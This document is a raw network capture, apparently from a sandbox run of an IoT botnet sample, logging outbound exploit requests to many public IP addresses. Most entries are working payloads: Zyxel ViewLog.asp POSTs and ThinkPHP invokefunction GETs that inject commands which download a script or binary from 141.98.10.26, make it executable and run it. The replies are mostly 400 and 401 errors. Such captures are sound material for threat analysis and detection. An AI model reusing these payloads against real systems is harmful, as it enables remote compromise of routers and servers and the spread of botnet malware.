Nov 22, 2023 08:40:02.817276001 CET	16124	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
365	192.168.2.23	47628	94.121.104.251	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.763845921 CET	7305	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
366	192.168.2.23	52988	94.122.215.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.763991117 CET	7305	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
367	192.168.2.23	43046	94.121.74.95	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.769031048 CET	7306	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
368	192.168.2.23	34436	62.3.164.190	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.866070986 CET	7308	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:50.069550037 CET	7314	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:38:49 GMT Content-Type: text/html Content-Length: 264 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
369	192.168.2.23	42592	94.122.104.139	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.886780977 CET	7309	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
370	192.168.2.23	56726	94.122.65.236	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.886919022 CET	7309	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
371	192.168.2.23	37932	94.120.2.19	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.893923998 CET	7310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
372	192.168.2.23	51346	112.65.217.62	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.054586887 CET	7314	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.522605896 CET	7359	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
373	192.168.2.23	32788	88.3.95.152	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.250924110 CET	7327	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.441545010 CET	7356	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="." Access-Control-Allow-Credentials: true Content-Type: text/html Content-Length: 125 X-XSS-Protection: 1; mode=block X-Frame-Options: deny X-Content-Type-Options: nosniff Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 65 72 72 6f 72 63 6f 64 65 3e 34 30 31 3c 2f 65 72 72 6f 72 63 6f 64 65 3e 20 3c 65 72 72 6f 72 64 65 74 61 69 6c 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 65 72 72 6f 72 64 65 74 61 69 6c 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>error</title></head><body><errorcode>401</errorcode> <errordetail>Unauthorized</errordetail></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
374	192.168.2.23	49472	88.99.14.70	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.250988960 CET	7327	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.439941883 CET	7355	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:50 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
375	192.168.2.23	47606	88.99.149.206	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.251014948 CET	7328	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.440042019 CET	7355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.13.8 Date: Wed, 22 Nov 2023 07:38:50 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 33 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.13.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
376	192.168.2.23	42454	88.80.21.3	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.255719900 CET	7329	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.457144022 CET	7357	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
377	192.168.2.23	36956	88.255.52.180	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.284516096 CET	7330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.519423962 CET	7359	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:49 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
Nov 22, 2023 08:38:50.538989067 CET	7360	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:49 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
Nov 22, 2023 08:38:50.586131096 CET	7361	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:49 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
Nov 22, 2023 08:38:50.679965019 CET	7374	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:49 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
378	192.168.2.23	59818	88.80.190.166	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.615814924 CET	7362	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.793350935 CET	7375	IN	HTTP/1.1 400 Bad Request Server: nginx/1.13.3 Date: Wed, 22 Nov 2023 07:38:50 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 33 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.13.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
379	192.168.2.23	45660	88.198.112.81	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:50.628487110 CET	7372	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:50.820235968 CET	7377	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:49 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 305 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 38 38 2e 31 39 38 2e 31 31 32 2e 38 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br 